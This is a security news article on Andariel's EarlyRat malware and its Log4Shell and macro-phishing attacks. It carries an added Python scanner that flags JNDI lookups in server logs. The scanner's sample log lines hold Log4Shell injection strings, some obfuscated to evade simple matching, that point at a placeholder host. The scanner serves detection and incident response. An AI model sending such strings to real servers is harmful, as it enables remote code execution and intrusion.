North Korean hacker group Andariel attacks with new EarlyRat malware – HacksByte

North Korean hacker group Andariel attacks with new EarlyRat malware

“Andariel infects machines by executing the Log4J exploit, which in turn downloads further malware from command-and-control (C2) servers,” Kaspersky said in a new report.

Also called Silent Chollima and Stonefly, Andariel is linked to North Korea’s Lab 110, a primary hacking unit that also includes APT38 (aka Bluenoroff) and other subordinate elements that are collectively tracked under the name Lazarus Group.

The threat actor is known to conduct cybercrime as an additional source of income for the sanctions-affected nation, in addition to conducting espionage attacks against foreign government and military entities of strategic interest.

Some of the major cyber-weapons in its arsenal include a ransomware strain called Maui, and several remote access trojans and backdoors such as Dtrack (aka Valefor and Preft), NukeSped (aka Manuscrypt), MagicRAT, and YamaBot.

NukeSped includes a range of features for creating and terminating processes and for transferring, reading and writing files on infected hosts. Its use overlaps with a campaign tracked by the US Cybersecurity and Infrastructure Security Agency (CISA) under the name TraderTraitor.

Andariel’s weaponization of the Log4Shell vulnerability in unpatched VMware Horizon servers was first documented in 2022 by the AhnLab Security Emergency Response Center (ASEC) and Cisco Talos.
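The initial-access step described above leaves a recognisable trace in the logs of the exposed server. The following scanner is an added example, not code from the article or from Kaspersky's report: it flags Log4Shell-style JNDI lookup strings in web server log lines and first collapses the nested-lookup obfuscations that defeat a plain `${jndi:` string match, returning the line number, the lookup scheme and the callback host so a responder knows what to block. All log lines, IP addresses and paths are constructed.

```python
import re

# Constructed sample access-log lines (not taken from the article). Line 1 is
# benign; lines 2-4 carry JNDI lookups in the User-Agent field, the last two
# using the nested ${lower:x} and ${::-x} forms seen in public advisories.
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Jun/2023:10:00:01] "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jun/2023:10:00:02] "GET /portal/ HTTP/1.1" 200 '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [01/Jun/2023:10:00:03] "GET /portal/ HTTP/1.1" 200 '
    '"${${lower:j}ndi:${lower:r}mi://203.0.113.10/x}"',
    '10.0.0.9 - - [01/Jun/2023:10:00:04] "GET /portal/ HTTP/1.1" 200 '
    '"${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.10/y}"',
]

# Innermost ${lower:x} / ${upper:x} lookups and the ${::-x} default-value trick.
NESTED = re.compile(r"\$\{(?:lower|upper):([^{}]+)\}|\$\{::-([^{}]*)\}", re.IGNORECASE)

# A resolved lookup: ${jndi:<scheme>://<host>...}; host is captured without port.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/:\s}\"]+)", re.IGNORECASE)


def normalize(text):
    """Repeatedly collapse nested lookups until the string stops changing."""
    previous = None
    while previous != text:
        previous = text
        text = NESTED.sub(lambda m: m.group(1) or m.group(2) or "", text)
    return text


def find_jndi_lookups(lines):
    """Return (line_number, scheme, callback_host) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = JNDI.search(normalize(line))
        if match:
            hits.append((number, match.group(1).lower(), match.group(2)))
    return hits


def callback_hosts(lines):
    """Distinct hosts the lookups point at: candidates for egress blocking and C2 hunting."""
    return sorted({host for _, _, host in find_jndi_lookups(lines)})


if __name__ == "__main__":
    for number, scheme, host in find_jndi_lookups(SAMPLE_LOGS):
        print(f"line {number}: jndi lookup via {scheme} to {host}")
    print("callback hosts:", callback_hosts(SAMPLE_LOGS))
```

Running the scanner against a real Horizon or reverse-proxy access log means feeding it the file's lines; a match is a strong signal that the server should be checked for the outbound fetch of the second-stage payload the report describes.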

The latest attack chain discovered by Kaspersky shows that EarlyRat is delivered via phishing emails carrying fake Microsoft Word documents. When opened, the files prompt recipients to enable macros, which executes the VBA code responsible for downloading the Trojan.

Described as a simple but limited backdoor, EarlyRat is designed to execute arbitrary commands and to collect system information and send it to a remote server. It shares high-level similarities with MagicRAT, although EarlyRat is written with the PureBasic framework while MagicRAT uses the Qt framework.

Another often overlooked tactic seen in attacks exploiting the Log4j Log4Shell vulnerability over the past year is the use of legitimate off-the-shelf tools such as 3Proxy, ForkDump, NTDSDumpEx, Powerline and PuTTY to extend the compromise once inside the target.

“Despite being an APT group, Lazarus is known to perform specific cybercrime tasks, such as deploying ransomware, which further complicates the cybercrime landscape,” Kaspersky said. “In addition, the group uses a variety of custom tools, constantly updating existing ones and developing new malware.”
